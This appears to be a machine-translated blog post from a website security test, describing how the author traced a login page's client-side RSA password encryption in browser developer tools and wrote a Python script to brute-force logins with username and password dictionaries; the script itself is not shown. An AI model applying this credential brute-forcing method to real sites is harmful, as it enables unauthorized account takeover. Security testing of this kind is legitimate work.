During the security test on a website, we found that the login password is encrypted, and the ciphertext generated by each login of the same password is different. We replayed the login interface with Burp and found that there is no restriction, so we can deduce that it can be cracked by violence.But because the password is encrypted, there is nothing Burp can do with the Violence cracking module, so I wrote a Violence cracking script with Pyhon.
When replaying the login interface with Burp, some parameters were deleted without affecting the response results.It is inferred that to crack violently, you only need to figure out how the password is encrypted and then simulate encryption to OK.In fact, it can be inferred from the length of the encrypted string and the result of each encryption that this should be asymmetric encryption.Again, dare to guess, this is RSA encryption.
Google Developer Tools Simple Analysis Front End JS
1. When you click the Login button, the password will be automatically lengthened (encrypted) and the login will be performed.It can be determined that encryption is a function of the click event of the Login button.
2. Find the function for the onclick event and the JS file where the event is located in the Event Listeners tab on the right.
3. Search for functions for click events on this page
4. Find RSA Public Key and Dependent JS Library
There are two ways I would like to simulate landing:
1. Extract all the JS files needed for encryption, use Python to manipulate JS to perform encryption, then extract the encrypted string, and use Python to login.However, this example has a large amount of JS code, and is prone to errors (I was unsuccessful) and inefficient when using Python to operate JS, so use the second method below.
2. Use Python for RSA encryption and then simulate login.Today's code is a way to simulate a login for violent cracking.
u.txt is the user name dictionary and p.txt is the password dictionary.
This example is not versatile and has a very small amount of code. It can be used as a reference for violent cracking of RSA encrypted logins. Of course, in some environments, both encryption and login are more complex than this.The key is to analyze the front-end JS.